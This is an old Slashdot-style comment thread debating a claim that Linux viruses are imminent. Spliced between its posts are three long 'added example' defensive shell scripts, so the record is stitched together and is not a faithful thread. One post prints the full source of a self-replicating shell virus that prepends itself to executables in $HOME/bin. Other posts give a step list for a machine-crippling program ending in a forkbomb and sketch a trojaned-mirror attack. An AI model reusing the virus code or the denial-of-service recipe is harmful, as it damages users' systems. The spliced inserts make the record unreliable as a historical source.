Linux Virii On Their Way?
Eric the Cat wrote to us with one of the most amusing articles for the day. A Russian Security Consultancy has claimed that a plague of virii for Linux will be coming, thanks to Chinese hackers. Wait - it gets better. According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems. Thankfully, Jason Clifford, a Linux person, is also quoted in the article setting the story a bit straighter.
course I'm still a newbie, so they coulda been lying to me.
Posted by NJViking:
Programs run in user space not kernel space so they can't fsck with your resources.
The virus would have to find a way to get root access.
I can see how something like kernel NFS or the new kernel web server could possibly be exploited to do this, which is why I won't run them.
NJV
hype hype hype Linux hype hype hype yup, same as always what happened to stuff that matters?
I am, therefore you think.
Does this mean we will all have to go out and buy Norton Antivirus for Linux now? I sure hope not.
Have a look for yourself: http://www.dictionary.com/cgi-bin/dict.pl?term=virus
Excerpt: "Unable to replicate without a host cell, viruses are typically not considered living organisms."
--
I would look to some people in Washington before I even thought of the world's largest Linux development team (red linux).
Well, seriously now, is it so crazy to suggest that a competing OS would encourage the engineering of a virus to weaken its competitors' credibility?
Real men dump cores! Read my journal, I am neat.
Of course viruses exist for Linux. Except they're called Trojans, and there are relatively easy ways to keep them out: check source, compile source especially for anything suid root. Or trust your distro.
Viruses/trojans are much less of a problem in *nix simply because most running should be done from unprivileged user accounts. That greatly confines the damage possible. Unfortunately, MS has yet to understand this concept.
-- Robert
a lame attempt at FUD? :) The 'threat' to Linux by virii is too small to be very concerned about - unless you're stupid enough to run one as root without checking it first :) -- F.P.
Any Unix virus will be limited to what one user can do. Any security bug can be fixed without breaking user programs.
The MS-DOS virus industry has been proliferating due to MS-DOS requiring user access to system hardware for decades.
Why are these virii only going to come from Russia? I mean, there are tons of "hackers" in other countries too. I like Kaspersky Labs' anti-virus software for win32, but I never expected them to make such a stupid comment. Sure, as more and more people use Linux, the chance of more people writing virii for it increases (more people with a lot of free time), but like Jason Clifford said, I can't make a virus run rampant through my system unless I execute the code as root. I still don't understand why they would only come from China? Melissa came from New Jersey, but all these new bad virii are going to come from China? Is this China's way of declaring war against the rest of the world?
Uhm, this article claims that Linux is particularly susceptible because the binaries are simple and easy to understand, therefore making them easier to modify. Unless we've gotten into the habit of running precompiled binaries as root without looking at the source first, I still don't think we have anything to worry about. The major threat here sounds like the ~/bin directory or something similar, unless you like leaving your /bin, /usr/... and /usr/local/... world-writable!
-rich henning -linux 2.2.x
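An added example, not part of rich henning's post or the original thread: a POSIX sh audit of the point made above, that a virus running as an ordinary user needs only one writable directory on the PATH (or a relative entry such as "." or an empty field, both of which resolve to the current directory) to plant a binary that root or another user will later execute. The function name audit_path_dirs, the sample PATH and the directories built by demo_path_audit are the example's own constructions.

```shell
#!/bin/sh
# Added example (not from the original thread). Audit a PATH string for the
# conditions that let an unprivileged user, or a virus running as one, drop
# a trojan binary that someone more privileged will later run:
#   - empty or relative entries ("" and "." resolve to the current directory)
#   - directories writable by group or others
#   - world-writable files inside otherwise sane directories
# Pure POSIX sh plus find(1) with -maxdepth (GNU and BSD find have it).

# Print one "<reason> <entry>" line per finding. Always returns 0 so it is
# safe under "set -e"; empty output means nothing was found.
audit_path_dirs() {
    rest="$1:"                        # trailing ":" so the loop sees the last field
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case "$entry" in
            "")  echo "empty-entry(cwd) ''"; continue ;;
            /*)  ;;
            *)   echo "relative-entry $entry"; continue ;;
        esac
        if [ ! -d "$entry" ]; then
            echo "missing $entry"     # whoever creates it first owns it
            continue
        fi
        # -perm -002 / -020: the "other" / "group" write bit is set
        if [ -n "$(find "$entry" -maxdepth 0 -perm -002 2>/dev/null)" ]; then
            echo "world-writable $entry"
        elif [ -n "$(find "$entry" -maxdepth 0 -perm -020 2>/dev/null)" ]; then
            echo "group-writable $entry"
        fi
        find "$entry" -maxdepth 1 -type f -perm -002 2>/dev/null |
            while read -r f; do echo "world-writable-file $f"; done
    done
    return 0
}

# Constructed demonstration: two temporary directories standing in for
# /usr/local/bin (sane, but holding one world-writable file) and ~/bin
# (left world-writable), plus an empty PATH field, a relative entry and a
# directory that does not exist yet.
demo_path_audit() {
    base=$(mktemp -d) || return 1
    mkdir "$base/sane" "$base/loose"
    chmod 755 "$base/sane"
    chmod 777 "$base/loose"
    : > "$base/sane/tool"; chmod 666 "$base/sane/tool"
    audit_path_dirs "/nonexistent/bin:$base/sane::$base/loose:."
    rm -rf "$base"
}

if [ "${1:-}" = "--demo" ]; then
    demo_path_audit
fi
```

Run it against the real thing with `audit_path_dirs "$PATH"` (and, for the root account, against root's PATH); anything it prints is a place where an unprivileged writer can put a binary that will be found before, or instead of, the system one.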
Even though there are ways that a Linux system can be compromised, it is usually through the root user installing malicious code himself. Aside from that, there is no other way a Linux user can infect his whole system by compiling an unknown program.
Maybe these Russians just thought they could shake up the media a bit if they did that... and get a fair share of the market, in case an "Antivirus for Linux" ever exists...
Besides being the name of a great Tori Amos single, this virus was discovered way back in 1997 and sparked a large amount of discussion amongst the virii community as to the feasibility and likelihood of Linux virii. Also, several Bliss-like virii later appeared, prompting most major anti-virus companies to release *nix versions of their AV toolkits.
My question is, why is slashdot reporting news that has been known for over 2 years?
"and no, im not the spot working for Transmeta, although i wish i was..." -- ~spot "i'm the epitome of public enemy..."
i know zdnet...(FUD)
//and here comes the problem
but there is really a problem.
you know the scenario:
./configure
make
su
make install
with faked libs and binaries, suid'd root and you could run into trouble.
i see a problem here
Of course, this all comes down to system configuration. If the system is properly configured, then viruses would be no problem. But who has the time, or the patience? The average user does not. And it is the average user who falls victim to viruses.
I can't say that I don't give a fuck. I've just run out of fuck to give.
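An added example that is not part of the posts above or of the thread: the step that belongs between "make" and "su; make install" in the sequence quoted above. Install into a staging directory while still the unprivileged user (the install target then runs with no privileges at all), inspect the staged tree for setuid or setgid files, world-writable files and files that would overwrite something already on the live system, and only then copy it into / as root. The Makefile, package and paths used by demo_staged_audit are hypothetical and constructed by the example.

```shell
#!/bin/sh
# Added example (not from the original thread). Replace
#   ./configure; make; su; make install
# with
#   ./configure; make; make DESTDIR=<stage> install   (still unprivileged)
#   audit_staged_tree <stage>                         (look before copying)
#   su; cp -a <stage>/. /                             (only now as root)

# Unprivileged build and staged install. Needs a DESTDIR-aware Makefile
# (autoconf-generated ones are); nothing in this function runs as root.
stage_build() {
    stage="$1"
    ./configure --prefix=/usr/local && make && make DESTDIR="$stage" install
}

# Print "<reason> <path as it would appear under />" for anything in the
# staged tree that deserves a look before it lands on the live system.
# Always returns 0; empty output means nothing was flagged.
audit_staged_tree() {
    stage="$1"; root="${2:-}"          # root="" means compare against the real /
    # setuid/setgid bits: the classic way an install target plants a root shell
    find "$stage" -type f \( -perm -4000 -o -perm -2000 \) -print |
        while read -r f; do echo "setuid-or-setgid ${f#"$stage"}"; done
    # world-writable files or directories (symlinks are skipped: always 777)
    find "$stage" ! -type l -perm -002 -print |
        while read -r f; do echo "world-writable ${f#"$stage"}"; done
    # files that would silently replace an existing binary or library
    find "$stage" -type f -print |
        while read -r f; do
            rel=${f#"$stage"}
            if [ -e "$root$rel" ]; then echo "overwrites-existing $rel"; fi
        done
    return 0
}

# Constructed demonstration: a fake staged tree and a fake live root, so the
# audit can be run without building anything or touching the real system.
demo_staged_audit() {
    work=$(mktemp -d) || return 1
    stage="$work/stage"; fakeroot="$work/root"
    mkdir -p "$stage/usr/local/bin" "$stage/usr/local/share/doc" \
             "$fakeroot/usr/local/bin"
    : > "$stage/usr/local/bin/tool";          chmod 4755 "$stage/usr/local/bin/tool"
    : > "$stage/usr/local/share/doc/README";  chmod 666  "$stage/usr/local/share/doc/README"
    : > "$stage/usr/local/bin/ls";            chmod 755  "$stage/usr/local/bin/ls"
    : > "$fakeroot/usr/local/bin/ls"          # already present on the "live" system
    audit_staged_tree "$stage" "$fakeroot"
    rm -rf "$work"
}

if [ "${1:-}" = "--demo" ]; then
    demo_staged_audit
fi
```

The staged tree is also the right thing to diff against the previous release, or to read the install target's own output from, because "make install" run as root will happily run any shell command the Makefile contains, whether or not it has anything to do with copying files.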
Kaspersky says that experts at his company's laboratories have successfully completed one such prototype: the result is a fully functional and potentially virile Linux virus. Kaspersky assures ZDNet that the virus is under lock and key and will stay that way.
:-)
I suppose he also has a list in his pocket of 205 communists^H^H^H^H^H^H^H^H^H^H viruses in the Linux department
* And remember, it's spelled N-e-t-s-c-a-p-e, but it's pronounced "Mozilla."
ummm the FAA still uses Ada.. so does Lockheed martin and BOEING.. a lot of the shuttle 's systems were written in Ada.. put down the crack pipe man..
One of the big strengths behind any Open Source software is implied in the nature of having the source: you get full disclosure of any problems with the software. ANYONE can inspect the code and find the strengths and problems of the software, as opposed to "taking the vendor's word for it".
We've seen it time and time again. Security through obscurity doesn't work. I still can't believe that there are *professionals* out there that still believe hiding how the software works is really the way to go.
Actually the use of Ada is generally a requirement for any defense work in the US. If you don't use Ada you need to justify why.
I recently had some of my Linux files infected by what was called a 'proto' virus. Though the virus only infected the files of that particular user, it was still a major pain to clean the files.
Though *nix has a very strict file permission system, it is still a big hassle if a user on a system gets infected, because then the sysop has to trace down who else on the system executed files of that user, and trace it down all the way.
Altogether it is just a big hassle, and it would be great if some virii cleaners were available for the whole system.
I wonder why this FUD was put out to begin with? It seems to me that the target audience was middle management and not the technical ranks. I think the technical rank and file who are Linux or Unix literate would just dismiss Kaspersky's claims.
Never knock on Death's door:
More race stuff in one place,
than any one place on the net.
(with apologies to Pink Floyd)
What if you boot a disk with a virus that infects LILO? Can any process (if it can even be called that at LILO time) survive the Linux boot process intact? What if the virus has enough smarts to find the root filesystem (specified in lilo) and wedge itself into /etc/inittab or some such?
Come on guys, let's get serious ... Have you ever seen any noticeable Chinese program?
Of course viruses exist for Linux. Except they're called Trojans, and there are relatively easy ways to keep them out: check source, compile source especially for anything suid root. Or trust your distro.
Well, there you are wrong. There exist real viruses for Linux. They are not trojans, and some of them even look for security holes in other computers so that they can break into them. Some links to the most "famous" ones:
Bliss
Staog
--
It has to work - rfc1925
I don't care what your stupid dictionary dot com site tells you; the word virus, being a Latin-derived word, has a plural of virii. It has nothing whatsoever to do with script kiddie crap; rather it has everything to do with proper usage of the language in question. You would do well to learn it before shooting off your mouth too.
Perhaps this may get its start in the Linux world if a virus or two starts to appear.
I'm not sure how difficult it would be to create such a thing under the open source model, since it would be easy to get around at first, but even closed-source antivirus apps currently available do not prevent people from getting around them. And open source software would probably be updated much more quickly at any sign of threat.
A universal, freely available, freely updatable, widespread (installed with every distro, possibly) antivirus could be the death of viruses as we know them.
Probably just wishful thinking on my part.
Haha! This Slashdot post is infected with an evil Linux virus! By reading it, you allowed it enter your system, from whence it will send itself all over the world!
I 0wn j00 n0w!
~~~~~~~~~
auntfloyd
This is based on the concept that the Chinese population, adopting Linux en masse, is as severely thwarted as the Eastern European and Middle Eastern virus writers of Win/DOS fame.
I see no signs of that. They're not disaffected in regards to computers, and would probably rather write Windows 2000 viruses to get back at the US than their "own" Linux. Wouldn't it be more of a point to attack Bill Gates than to attack your own system?
Will in Seattle
Remember Melissa? It didn't do anything other than make a private note that it had visited and send emails. Think that Unix permissions help against something like this?
Most people keep a lot of important data writable by themselves in their home directory. Sure, "nothing important" may have been deleted, but you could still lose all of your files.
Recall the Internet Worm? This came up before. There was nothing special about it, it just was a worm that could spread itself without any human action. That made its generation time a fraction of a second (as opposed to the 15-minutes to an hour for Melissa), which resulted in its almost instantaneous spread to every machine it could infect. Unix permissions helped against this how?
No, Linux is not immune to viruses. And as long as buffer overflows and the like continued to be treated as minor oversights and not like the major threats that they are (even if the program is only running with user-level permissions), Linux will be vulnerable. Once it becomes popular it will likely become a target...
Until then don't sweat it. After all the fire hasn't burned the house down yet, and we are fireproof. Aren't we?
Regards,
Ben
PS The time for a fix to become available is meaningless. What is the time for that fix to become incorporated on the average machine out there? Ri-ight.
My usual seat in the cluetrain is at http://pub4.ezboard.com/biwethey.ht
That being said, I also used to hang out on FidoNet's virus echos in 1994 and 1995, where some of the true anti-virus experts hung out too. And yes, I consider Eugene Kaspersky of AVP (the guy who was quoted in the article) to be one of them. Back when the first Word macro virus (Winword.Concept) appeared, he was the one who I saw first post about it to Fido's VIRUS echo, and he was also the first one to release a fix for it (another Word macro which caught and disinfected Winword.Concept).
Unfortunately, I fear this is another case of False Authority Syndrome in that while Eugene may know viruses very well, I question his credentials in the UNIX/Linux area. For one thing, for a virus to replicate to a considerable degree on a system, you'll need to be running as root -- if you're logged in as a regular user, any program you run isn't going to be able to infect /bin/ls, no matter how hard you try. :-)
I think Kaspersky also misunderstands the nature of UNIX/Linux, in that a lot of applications (the stuff *I* use, anyway, like Apache, PHP, MySQL, etc.), when downloaded from the net, are usually done so in source form, and the end user compiles the code and runs it. It would be foolish if someone tried to put replicating code in their source, as it would be spotted very quickly and the author would have some serious explaining to do.
Finally, just to play the Devil's Advocate, I think problems could arise if, say, a binary in a distribution is infected, and then is sold to thousands of unsuspecting end users. All it would then take is to run that binary as root, and you suddenly have an infection on your hands. However, I don't see this as a very likely scenario, since I can count the number of Linux-based viruses which I have heard of on one hand. For the reasons I outlined above, Linux just isn't a very attractive platform to virus writers, who want to see their creations spread.
I am sure Macro$haft has been trying to write Linux virii for a long time. There are certainly a lot of people who would like to see Linux fail, but hundreds of thousands more who would like to see it succeed.
In the end, even if a virus were to come out that was temporarily damaging to Linux, a fix would be out later that day, and Linux would only be stronger because of it.
Now Macro$haft, on the otherhand, has known about Back Orifice 2000 for a LONG TIME, and hasn't lifted a finger to fix the problem or patch any of the security holes it exploits.
Which product would you rather use? I will stick with open source.
There's an unwritten law that many seem to be overlooking here, overconfident as they are that Unix is beyond anything past user-level desecration.
God, or his swarthy minions, will create a better breed of virus to accomplish what, perhaps right now, seems impossible or at least unlikely. Computers are no less susceptible to disease than their progenitors, Man, and just as we smite an infectious contagion, another, more virulent strain appears to take its place. Such will be the same in the world of technology, and while the term 'virus' or 'worm' or 'microsoft' may be misleading as to the exact nature of the affliction, something will find its way to creation. Because Man cannot allow itself to be bettered by its own creation.
NEWS FLASH!!!
open source news. an outbreak of a disease similar to the ebola virus has killed at least 63 computers during the past few months in the democratic republic of congo, health officials said monday.
the affliction, which causes sudden high fevers and massive bleeding like ebola, surfaced in january in the northeast part of the country near watsa, a town close to the border of sudan and uganda.
all of the deaths are associated with the open source development town of durba, according to a world health organization representative in the capital kinshasa. reports of deaths elsewhere had not yet been verified, the official said.
a total of 350 computers died around the town of kikwit in the former zaire in 1995 in the most serious known epidemic of ebola, for which there is no known cure.
the disease kills most of its victims, and death usually happens within 48 hours.
the partly state-owned office of kilo-moto (okimo) open source development company operates in durba.
the who official, quoting information obtained from a radio conversation with a computer technician in durba, said that two of the dead were okimo computers but most were systems used by independent programmers.
other dead linked to the Durba outbreak include two aptivas, three compaqs and the laptop of the computer technician who treated the first victims. it died saturday in isiro, to the west of watsa.
the cause of the fever outbreak was not immediately clear.
a team from the programmers without borders technical charity has arrived in the region. they had protective gear and would take samples for testing abroad, who officials said.
scientists have linked ebola outbreaks elsewhere to computers that ate or handled russian floppy disks which had been used in computers that had died of the disease.the cdc has issued an outbreak alert for areas of zaire.
thank you.
All American propaganda! Get lost, losers!
In addition to the technical reasons cited in the article, I believe there's a cultural reason that viruses won't proliferate under Linux and other Unixes. Unlike Windows users, Linux users don't email executable files, such as this past holiday season's "Elf Bowling" and "Frogapault", to one another. If people only get executables from safe sources, e.g. from the vendors or developers themselves, or from well-known sites like metalab, there's little danger of passing around malicious code.
(This is not to say, of course, that we shouldn't step up efforts to distribute code with digital signatures. If someone compromised metalab we could be seriously screwed.)
--
We all know how the saying ends.
Even *if* viruses are unleashed upon the Linux world, and even *if* there are ones that exploit holes... We all should have a fair amount of confidence that they will be fixed--and fixed correctly in a relatively short time. With so many people able to look at source, one should expect this.
Virus writers will have an extremely difficult (if not impossible) time spreading binary viruses. Of course, with the spread of downloading of rpms and debs, one might expect the possibility to increase. I for one rarely download rpms, and then only from trusted sites.
The mirror will invariably be turned back on the virus authors, as we would have the source to their viruses, and all of the holes will be fixed that much quicker, including fixes for variations of the viruses.
Nothing will protect the newbie from getting their personal account deleted, any more than in the Windows world, getting their machine wiped. And anyone ignorant enough to run everything as root will of course get their machine wiped. Wasn't it MCI that got caught by a virus because they ran too much stuff as Administrator in NT?
There is nothing to indicate that the self-policing world of open source will crumble. I'd predict things would become even more secure.
I run as root all the time. I cut my teeth on DOS, Windows, and then NT, and have always run with Administrative privileges. Never had a problem, I am just extremely careful with what I do.
Most of the time I use Linux I am tinkering, recompiling, reinstalling new versions etc... things that require root access. So why bother with the fiction of a 'user' account?
Ok, so I might be exposing myself to a slightly greater risk with regards to Linux viruses - guess that's what backups are for.
-josh
The program should do the following:
(1) Fill up /tmp, /var/tmp, and /usr/tmp.
(2) malloc up as much memory as possible.
(3) Continuously read files randomly (to defeat caching) all over the filesystem to slow down disk access.
(4) Lock up X (not hard to do). This can totally seize up the display and keyboard, rendering the machine useless. And if you can't telnet in from elsewhere, you'll be forced to hit reset and uncleanly unmount all file systems, with potential for loss of data.
(5) When all else is done, forkbomb!
I think the real problem related to this is that none of the distros (at least the ones I've used) require any user account to be set up besides the root account at installation time, nor is the user prompted by the install program to do that later on. If users were required to create an initial account for themselves, and instructed by the installation program not to use the root account for anything except maintenance and program installation, more of the newbies would probably run as unprivileged users most of the time. In addition, such an installer could ask the user if he/she wants to set up some useful groups for getting "half-god" privileges, like write ability to /usr/local and mount ability on /dev/cdrom and /dev/floppy. That sort of privilege would not compromise system security much, but would restrict the occasions on which a user "su -"'s...
--The knowledge that you are an idiot, is what distinguishes you from one.
Look at me, I'm shaking in my little space boots :)
I guess this virus will attack every Linux based system EXCEPT Red Flag Linux, right?
Finkployd
Bill Gates: "Innovation"
you're wrong and he's right. face the facts fudge packer.
According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems.
The "security expert" has a point, but does not seem to be seeing the whole picture. Open source might make it easier for malicious virus-writers to exploit Linux... but it also makes it easier for the rest of us to see what devious tricks they're up to and protect ourselves. I'm going to be generous and suggest that there are more of us than there are of them. There are probably better minds working on the "good-guy" team too.
I don't see how this would make Linux viruses "worse", though theoretically they could be more prevalent. In that unusual scenario, it might be advisable for the uninformed newbies to stick with closed-source OS'es (like they don't already?), since they don't yet know how to protect themselves.
Windows et al might then rightfully be seen as "training wheels" OS'es, for people to use until they learn what they're doing and are ready to graduate to open source.
As most viruses in the real world are NOT written to exploit open-source OS'es, even that argument doesn't apply in reality. If it's not a good entry-level OS (for security reasons), what IS Windows good for?
It was in the old InfoMagic distro from ftp.cdrom. You had to run Doom as root, and it infected you that way!
But we've all learned since then not to run as root - rrrriiiight!
"History doesn't repeat itself, but it does rhyme." Mark Twain
But then I stopped and thought for a second. Given his complete ignorance of how Unix-like operating systems work, he just assumed that more malicious coders + more popularity = more viruses. I took some time explaining that Linux was different because of a) availability of source code b) permissions and c) the extreme wariness of the average Linux user of running untrusted binaries. I said my attitude is that if I can't get the source for it, then I won't run it - and I certainly won't run it as root.
Result: he's now running RedHat as his OS of choice. Yes these stories are funny to any halfway experienced user of Linux. But take some time to explain to a Windows-using friend why they are, and you're well on the way to more effective advocacy.
--- Hot Shot City is particularly good.
- a) less than savvy users. download some untrustworthy source or kernel source or even some binaries and voila, point of infection.
- b) distro poisoning, easier said than done (remember tcp_wrappers got infected, too)
- c) worm-style incidents using poorly known holes in major distros (ie Linuxconf vulnerabilities, Apache holes, etc..).
it's a lot easier than some of you may think. a scenario for you: mirror mirror.example.com gets rooted and trojaned versions of key RPMs of the latest RedHat distro are placed in. MD5 sums are altered and the whole thing looks legit. once installed, the packages (gcc, a kernel module, and a few access trojans like telnetd or sshd) lie in wait. the kernel module keeps the user from seeing the problem, gcc's trojan always keeps trojans in the system, and the listening entry points are there and well hidden. bingo, you have a problem. say, in a TFN or Trin00 manner you manipulate the systems to rm -rf. trust is a magical thing to abuse. and users' trust is getting greater and greater. how many times has the schlub in the cubicle next to you downloaded some spiffy screensaver from the net or run some "executable" from their email? all too often... :)
bear in mind that Thompson built a cc trojaned to allow him to log in specially on any box using his cc, which also built its trojan-propagating systems in, too. :) Thompson's not malicious, but some people are.
think about all the s|
jose nazario jose@biocserver.cwru.edu
Hm -- do you actually know anything about Latin? I would suggest you check Tom Christiansen's detailed page on this topic. Maybe it will help you avoid "shooting off your mouth" in the future.
You don't need a weatherman to know which way the wind blows.
Here's a portable unix virus. Originally based on the shell script header produced by "gzexe", it contains the necessary apparatus to infect other executables, but no payload. There are at least two problems with the version enclosed in this message which prevent it from functioning.
Also, it's probably not as "portable" as I'd like, due to relying on bash features. Eh, too bad.
#!/bin/sh
signature=PORTABLE-UNIX-VIRUS # Written by jepler@inetnebr.com, I hope this is crippled enough that it cannot actually infect you
#set -x
if [ $USER != jnobody ]; then exit 1; fi
skip=7676
seed=1
# Linear congruential generator, used only to pick a victim file at random.
function srandom () { seed=$[$$+`date +%s`] }
function random () { seed=$[($seed*171)%30269] ; if [ $1 -eq 0 ]; then echo 1; else echo $[$seed%$1] ; fi }
function choose () {
    shift `random $#`
    echo $1
}
# A file counts as infected when its second line carries the signature.
function infected () {
    head -2 $1 | tail -1 | grep $signature > /dev/null
}
function infect () {
    # pathlist=`echo $PATH | tr : " "`
    # dir=`choose $pathlist`
    dir=$HOME/bin
    echo "Will infect in $dir"
    names=`find $dir -maxdepth 1 -type f`
    name=`choose $names`
    echo "will infect $name"
    if infected $name; then
        echo Already infected
    else
        if [ ! -w $name ]; then
            notwrite=1
            chmod u+w $name
        fi
        if [ -w $name ]; then
            infectfile=`mktemp /tmp/if$$.XXXXXX` || {
                echo 'cannot create a temporary file' >&2
                exit 1
            }
            # Prepend this header (everything before line $skip) to the victim.
            (head -$[$skip-1] $0; cat $name) > $infectfile
            cat $infectfile > $name
            rm -f $infectfile
            if [ x$notwrite = x1 ]; then
                chmod u-w $name
            fi
            echo success
        else
            echo Darn, no write permissions
        fi
    fi
}
srandom
tmpfile=`mktemp /tmp/gz$$.XXXXXX` || {
    echo 'cannot create a temporary file' >&2
    exit 1
}
# gzexe-style: the original program follows the header from line $skip on;
# extract it, infect another file, then run the original with the same arguments.
if tail +$skip $0 > $tmpfile; then
    infect
    chmod 700 $tmpfile
    prog="`echo $0 | sed 's|^.*/||'`"
    if ln $tmpfile "/tmp/$prog" 2>/dev/null; then
        trap 'rm -f $tmpfile "/tmp/$prog"; exit $res' 0
        (sleep 5; rm -f $tmpfile "/tmp/$prog") 2>/dev/null &
        /tmp/"$prog" ${1+"$@"}; res=$?
    else
        trap 'rm -f $tmpfile; exit $res' 0
        (sleep 5; rm -f $tmpfile) 2>/dev/null &
        $tmpfile ${1+"$@"}; res=$?
    fi
else
    echo Cannot decompress $0; exit 1
fi; exit $res
true
Sometimes, I feel that Linux is a huge, 640M virus just out to ruin my life. Then I remember that resolv.conf only has one "e" in it and continue on with my mission.
It spreads from user to user, and once you're infected, you can never go back.
It has been know to cripple and even destroy WinXX systems to the point of making itself the dominant OS on any machine.
It makes its users say crazy things like "awk", "grep", "FUD", and so on....
I do what the voices on my console tell me to do.
We need to grind PGP/GPG further into the Linux infrastructure, perhaps to the point of making it default behavior. That will validate that the package is what was shipped, and not tampered with en route. Then we need to have a way to know WHO to trust. Both of these problems have been solved by the PGP/GPG community. Now that the USA is less opposed to encryption, we just need to move them into the infrastructure. It should be the default behavior to give some sort of way to newbie-proof distributions, simply so the inexperienced don't accidentally become disease vectors. Obviously the mechanisms need override capabilities for the experienced. But B.Operator is right, in that even having the source is of little good unless you go through it for the security exposures. Simply getting source and following INSTALL is no more secure than a binary.
The living have better things to do than to continue hating the dead.
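An added example, not part of this post, of jose nazario's post above, or of the thread, covering both the compromised-mirror scenario described earlier (trojaned RPMs with the MD5 sums rewritten to match) and the point just made about PGP/GPG signatures. A checksum list served from the same mirror as the packages is rewritten by whoever rewrote the packages, so it proves nothing; what catches the swap is a detached signature made with a key that never lives on the mirror, checked against a public key the client obtained out of band. openssl(1) stands in for gpg --verify here so the demo needs no keyring (rpm itself carries GPG signatures checkable with rpm --checksig; the SHA256SUMS file layout below is the example's own); the package name, the "mirror" directory and the key pair are constructed by demo_mirror_compromise.

```shell
#!/bin/sh
# Added example (not from the original thread). Shows why "MD5 sums are
# altered and the whole thing looks legit" is the expected outcome of a
# rooted mirror, and what a signature from an off-mirror key adds.
# Requires openssl(1) and GNU sha256sum.

# Weak check: the mirror's own checksum list. Catches transfer corruption and
# nothing else, because the attacker regenerates it along with the packages.
check_sums() {
    (cd "$1" && sha256sum -c --quiet SHA256SUMS) >/dev/null 2>&1
}

# Real check: SHA256SUMS must verify against the pinned vendor public key
# before it is trusted, and only then is it used to check the packages.
# (With gpg: gpg --verify SHA256SUMS.sig SHA256SUMS, same ordering.)
verify_signed_sums() {
    dir="$1"; pubkey="$2"
    openssl dgst -sha256 -verify "$pubkey" \
        -signature "$dir/SHA256SUMS.sig" "$dir/SHA256SUMS" >/dev/null 2>&1 &&
    check_sums "$dir"
}

# Constructed demonstration: publish a release, then play the attacker who
# roots the mirror, swaps a package and regenerates the checksum list.
# Prints "before sums=ok signed=ok" and "after sums=ok signed=FAIL".
demo_mirror_compromise() {
    work=$(mktemp -d) || return 1
    mirror="$work/mirror"; mkdir "$mirror"
    # vendor side: key pair generated and kept off the mirror; the client
    # has pinned.pub from somewhere other than the mirror
    openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 \
        -out "$work/vendor.key" >/dev/null 2>&1
    openssl pkey -in "$work/vendor.key" -pubout -out "$work/pinned.pub" 2>/dev/null
    printf 'pretend this is the real gcc package\n' > "$mirror/gcc-2.95.i386.rpm"
    (cd "$mirror" && sha256sum gcc-2.95.i386.rpm > SHA256SUMS)
    openssl dgst -sha256 -sign "$work/vendor.key" \
        -out "$mirror/SHA256SUMS.sig" "$mirror/SHA256SUMS"
    b_sums=$(check_sums "$mirror" && echo ok || echo FAIL)
    b_sig=$(verify_signed_sums "$mirror" "$work/pinned.pub" && echo ok || echo FAIL)
    # attacker with root on the mirror: replace the package, refresh the sums
    printf 'pretend this is the trojaned gcc package\n' > "$mirror/gcc-2.95.i386.rpm"
    (cd "$mirror" && sha256sum gcc-2.95.i386.rpm > SHA256SUMS)
    a_sums=$(check_sums "$mirror" && echo ok || echo FAIL)
    a_sig=$(verify_signed_sums "$mirror" "$work/pinned.pub" && echo ok || echo FAIL)
    rm -rf "$work"
    echo "before sums=$b_sums signed=$b_sig"
    echo "after sums=$a_sums signed=$a_sig"
}

if [ "${1:-}" = "--demo" ]; then
    demo_mirror_compromise
fi
```

The ordering inside verify_signed_sums is the whole point: the signature is checked first, on the checksum list, and the list is consulted only after it passes. Verifying the sums first and the signature "if available" leaves the mirror free to drop the .sig file along with the rest.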
... and it's called VIGOR. :-)
Linux users might have more trouble with emacs viruses. Though I don't know how many people use it as a mail client.
OK, I think most of us can agree with this:
:-)
In order for a virus to have a real effect it would require someone to be stupid enough to run (log in) as root
And with this:
It's not so much about the product but about how you manage your system. We advise people never to do anything in root unless they absolutely have to
But the problem lies with people who run Linux but lack background with Unix configuration and security policies. For a lot of people, the user/root distinction is a pain in the ass, because they're used to Windows. They don't want to learn new stuff to run Linux, they just want to use the latest cool thing. So they end up doing most everything as root, because it's easier that way. This is plainly stupid, and invites disaster, but some people will never learn until their noses are rubbed in the steaming pile of idiocy they've just laid.
So I wouldn't be too surprised to see some sort of Linux trojan horse emerge, even if it required full root access in order to be effective. Clueful users would not get directly infected, but if the trojan became widespread they might suffer some indirect trouble from it.
Also, given that this was reported on ZDNet, I can't help but wonder if the FUD is motivated by antivirus s/w companies scared of losing their market. But maybe I'm just too paranoid for my own good, eh?
And you may ask yourself, well, how did I get here?
being a latin derived word
Yep
has a plural of virii
Nope. Virii would be the plural of virius, which isn't a word. In fact, authorities disagree on the plural of virus -- see here for a reasonably erudite discussion.
The authors' comment on "Virii" is:
"Virii is still completely silly, so don't do that; otherwise, everyone will know you're just a blathering script kiddie.
I think this is a bit harsh, and probably motivated by an otherwise admirable Anglo-Saxonism, favouring "Viruses". For my money, virus in meaning plus etymology is a group of items, treated as a single item, which follows the literal Latin meaning of "poison". As a result, it is analogous with "prospectus", and the correct plural is "virus", with a long final 'u'.
For those who are really interested in the reasoning behind this interpretation, this site may be of interest.
A trojan is a delivery mechanism, a virus is a self replicating program.
A virus might attach itself to a benign program, thus transforming that program into an unwitting trojan, or a trojan might deliver a non-self-replicating program - even a virus killer.
Of course either of the two can exist on Linux, but Linux (and all Unices) have security mechanisms to minimise the damage done by, and propagation of, these beasties.
Why couldn't someone simply write a userspace TTY program that interfaces with the TTY underneath it? So, to the user, it doesn't appear that there is anything wrong, when in fact all the keystrokes go to the program?
[ c h a d o k e r e ]
ReadThe ReflectionEngine, a cyberpunk style n
if this fella offered to show the locked up completed Linux virus to one of the major kernel hackers - maybe Alan or Linus - so we all could get a knowledgeable assessment of the possible current and future dangers. Just a thought
"shop smart:shop s-mart" ash
...not the "cure-all" for an insecure system. Chmod and chgrp are tools, just like /etc/hosts.deny. Security is a combination of a software engineering issue and a policy issue: great security ideas are often poorly implemented, either in software, or by a particular system administrator (*cough*... NT... *cough*).
;). Check out this page for an explanation. (Link kindly donated by a previous /. article.)
For example, Windows NT has a much more granular permissions implementation than most Unix systems (NT uses ACLs), but viruses still run rampant on NT boxes due to poor administration. If I had a dollar (or hell, even five cents) for every time I saw someone logged in as Administrator to use M$ Office, I'd be a rich man. The virus problem is even worse under Win9x variants: there aren't any (or very many) security tools, including filesystem permissions, to use.
A well-thought out security policy can guard against most any virus - it's ignorance that viruses prey on, regardless of the OS.
And please: the plural of virus is viruses, not viri or any other abuse of Latin
isn't a sneaky virus, it's a sneaky tech help guy. In Linux, hired help can recompile/rewrite anything, no?
